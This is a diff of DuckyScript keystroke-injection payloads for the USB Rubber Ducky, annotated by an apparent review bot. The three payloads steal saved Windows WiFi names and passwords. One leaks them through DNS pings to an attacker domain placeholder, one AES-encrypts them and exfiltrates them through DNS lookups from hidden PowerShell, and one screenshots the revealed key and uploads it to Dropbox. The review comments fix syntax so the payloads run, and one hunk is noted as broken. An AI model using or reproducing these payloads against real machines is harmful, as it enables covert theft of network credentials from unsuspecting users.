# Author: Keld Norman / Twitter: @keld_norman
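Review bot: with the block now wrapped in `REM_BLOCK`, the leading `# ` on each comment line is redundant; harmless, but dropping it would match the other REM_BLOCK headers in this commit.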
@ -20,29 +21,17 @@
# Be aware that exfiltrated WiFi names and code will be send in clear text over the internet..
#
# TODO: This only works for WiFi names without space in the name.
#
END_REM
DUCKY_LANG US
REM Target: WINDOWS
REM Purpose: Exfiltrate all saved WiFi names + PSK via DNS
DELAY 3000
DELAY 2000
DEFAULT_DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT Y
DELAY 500
ENTER
DELAY 500
STRING @echo off
DELAY 500
ENTER
DELAY 500
STRING for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
DELAY 500
ENTER
DELAY 500
STRING exit
DELAY 500
ENTER
STRINGLN @echo off
STRINGLN for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
STRINGLN exit
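Review bot: `CTRL-SHIFT ENTER` is the only key combination in this commit written with a hyphen; every other combo here (`CONTROL ESCAPE`, `ALT Y`, `CTRL TAB`, `ALT F4`) is space-separated, so if the compiler does not accept the hyphenated form this line remains a compile error of exactly the kind the commit sets out to fix; please confirm or change it to `CTRL SHIFT ENTER`. Both `DELAY 3000` and `DELAY 2000` also appear ahead of `DEFAULT_DELAY 500`; only one of them should survive.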

View File

@ -1,3 +1,4 @@
REM_BLOCK
# Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS
# Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256
# Author: Keld Norman / Twitter: @keld_norman
@ -18,57 +19,48 @@
3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block)
4. The last line called $encoded will produce an output that is the powershell code in an encoded form
4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string
END_REM
DUCKY_LANG US
GUI R
DELAY 2
STRING cmd.exe
DELAY 1
ENTER
STRING powershell.exe -windowstyle hidden -NoProfile -EncodedCommand PUT-THE-ENCODED-CODE-HERE
ENTER
DELAY 2000
#-----------------------------------------------------------------------------------------------------------
# COPY THIS AND PASTE IT IN TO A POWERSHELL TERMINAL ON YOUR OWN WINDOWS PC
#-----------------------------------------------------------------------------------------------------------
$scriptblock={
function enc{[CmdletBinding()][OutputType([string])]
Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
$sha=New-Object System.Security.Cryptography.SHA256Managed
$aes=New-Object System.Security.Cryptography.AesManaged
$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
$aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
$aes.BlockSize=128
$aes.KeySize=256
$aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
$byt=[System.Text.Encoding]::UTF8.GetBytes($T)
$cry=$aes.CreateEncryptor()
$enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
$enc=$aes.IV+$enc
$aes.Dispose()
$sha.Dispose()
$b64=[System.Convert]::ToBase64String($enc).ToCharArray()
foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
return $hex
}
function dns{
$tik=Get-Date -UFormat "%j%H%M%S"
$subchars=get-random -minimum 26 -maximum 50
[regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
}
function wifi {
$wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
$wifinames.trim()
}
$KEY="EncryptDataWithThisCode"
$SUB=".i.yourdomain.com"
wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
}
$encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
$encoded
#-----------------------------------------------------------------------------------------------------------
# END OF STORY
#-----------------------------------------------------------------------------------------------------------
GUI r
DELAY 500
STRINGLN cmd.exe
DELAY 500
STRINGLN powershell.exe -windowstyle hidden -NoProfile -EncodedCommand $scriptblock={
STRINGLN function enc{[CmdletBinding()][OutputType([string])]
STRINGLN Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
STRINGLN $sha=New-Object System.Security.Cryptography.SHA256Managed
STRINGLN $aes=New-Object System.Security.Cryptography.AesManaged
STRINGLN $aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
STRINGLN $aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
STRINGLN $aes.BlockSize=128
STRINGLN $aes.KeySize=256
STRINGLN $aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
STRINGLN $byt=[System.Text.Encoding]::UTF8.GetBytes($T)
STRINGLN $cry=$aes.CreateEncryptor()
STRINGLN $enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
STRINGLN $enc=$aes.IV+$enc
STRINGLN $aes.Dispose()
STRINGLN $sha.Dispose()
STRINGLN $b64=[System.Convert]::ToBase64String($enc).ToCharArray()
STRINGLN foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
STRINGLN return $hex
STRINGLN }
STRINGLN function dns{
STRINGLN $tik=Get-Date -UFormat "%j%H%M%S"
STRINGLN $subchars=get-random -minimum 26 -maximum 50
STRINGLN [regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
STRINGLN start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
STRINGLN }
STRINGLN function wifi {
STRINGLN $wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
STRINGLN $wifinames.trim()
STRINGLN }
STRINGLN $KEY="EncryptDataWithThisCode"
STRINGLN $SUB=".i.yourdomain.com"
STRINGLN wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
STRINGLN }
STRINGLN $encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
STRINGLN $encoded
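Review bot: this hunk changes behaviour, contrary to the commit message. The old payload typed `powershell.exe -windowstyle hidden -NoProfile -EncodedCommand PUT-THE-ENCODED-CODE-HERE` and kept the `$scriptblock={ ... }` / `$encoded` helper as a commented block to be pasted into the author's own PowerShell terminal (see the `# COPY THIS AND PASTE IT IN TO A POWERSHELL TERMINAL ON YOUR OWN WINDOWS PC` banner and steps 3-4 in the README text at the top of the hunk). The new version fuses them: `STRINGLN powershell.exe -windowstyle hidden -NoProfile -EncodedCommand $scriptblock={` hands a plaintext brace to `-EncodedCommand`, and the thirty-odd `STRINGLN` lines that follow are then typed into cmd.exe, which cannot run them; the placeholder that steps 3-4 refer to no longer exists anywhere in the file. Restore the `-EncodedCommand PUT-THE-ENCODED-CODE-HERE` line and move the helper script back into the `REM_BLOCK` (or into a separate .ps1 beside the payload) so that only the encoded string is typed on the target.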

View File

@ -1,223 +1,97 @@
REM Title: WiFi_Passwd_Grab
REM Author: LulzAnarchyAnon
REM Description: This is a Three stage payload that begins by navagating to Network
REM Description: and Sharing Center. It then opens the wireless properties security
REM Description: tab, and makes the Network security key visible finally taking a screenshot.
REM Description: In the Second stage the screenshot is saved to the Downloads folder.
REM Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Exfiltration
REM_BLOCK
Title: WiFi_Passwd_Grab
Author: LulzAnarchyAnon
Description: This is a Three stage payload that begins by navagating to Network
Description: and Sharing Center. It then opens the wireless properties security
Description: tab, and makes the Network security key visible finally taking a screenshot.
Description: In the Second stage the screenshot is saved to the Downloads folder.
Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
Target: Windows 10 PowerShell
Props: Darren Kitchen and I am Jakoby
Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices.
This payload may need minor adjustments to run properly depending on
Attacker, and Target devices.
REM Check out I am Jakoby on Youtube to set up your DropBox for uploads.
Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 1000
REM Stage 1
GUI r
DELAY 200
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
DELAY 1000
ENTER
DELAY 1000
ALT Y
DELAY 1000
GUI r
DELAY 1000
STRING control.exe /name Microsoft.NetworkAndSharingCenter
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
CTRL TAB
DELAY 1000
TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
REPEAT 6 SHIFT TAB
SPACE
DELAY 2000
PRINTSCREEN
DELAY 2000
ALT F4
DELAY 2000
ALT F4
DELAY 2000
ALT F4
DELAY 2000
REPEAT 3 ALT F4
REM STAGE 2
GUI r
DELAY 200
STRING powershell -windowstyle hidden
ENTER
DELAY 2000
STRING mspaint
ENTER
DELAY 5000
STRINGLN powershell -windowstyle hidden
STRINGLN mspaint
CTRL v
DELAY 1000
CTRL s
DELAY 1000
ALT d
DELAY 1000
STRING %USERPROFILE%\Downloads
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
STRINGLN %USERPROFILE%\Downloads
REPEAT 6 TAB
STRING wifipasswd
DELAY 1000
ALT s
DELAY 1000
ALT F4
DELAY 5000
STAGE 3
REM STAGE 3
GUI r
DELAY 200
STRING powershell
DELAY 200
ENTER
DELAY 2000
STRING function DropBox-Upload {
DELAY 500
ENTER
STRING [CmdletBinding()]
DELAY 500
ENTER
STRING param (
DELAY 500
ENTER
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
DELAY 500
ENTER
STRING [Alias("f")]
DELAY 500
ENTER
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRING }
DELAY 5000
STRINGLN powershell
STRINGLN function DropBox-Upload {
STRINGLN [CmdletBinding()]
STRINGLN param (
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRINGLN [string]$SourceFilePath
STRINGLN )
STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
STRINGLN "
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
STRINGLN $TargetFilePath="/$outputFile"
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
STRINGLN $headers.Add("Authorization", $authorization)
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRINGLN }
GUI r
DELAY 200
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 1000
STRINGLN %USERPROFILE%\Downloads\
STRINGLN wifipasswd
GUI r
DELAY 500
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 500
STRINGLN %USERPROFILE%\Downloads\
STRINGLN wifipasswd
ALT h
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
REPEAT 5 TAB
ENTER
DELAY 500
ALT F4
DELAY 1000
CTRL v
DELAY 5000
STRING | DropBox-Upload
DELAY 500
ENTER
DELAY 5000
STRINGLN | DropBox-Upload
ENTER
ALT F4
DELAY 100
ENTER
ENTER
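Review bot: `STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE` followed by `STRINGLN "` is carried over verbatim from the old `STRING` version and is exactly the kind of typo this commit is meant to fix: the second `"` ends the string before the placeholder, leaving `YOUR-DROPBOX-ACCESS-TOKEN-HERE` as an unexpected token, and the stray `"` on the next line opens an unterminated string, so the whole `DropBox-Upload` function fails to parse even after the placeholder is filled in. It should be the single line `STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE"` with the `STRINGLN "` line removed. Separately, please confirm the device's `REPEAT` syntax: `REPEAT 6 SHIFT TAB`, `REPEAT 3 ALT F4`, `REPEAT 6 TAB` and `REPEAT 5 TAB` put the key on the REPEAT line, whereas classic DuckyScript `REPEAT n` repeats the previous line, in which case these would need to be written as `SHIFT TAB` followed by `REPEAT 5`, and so on.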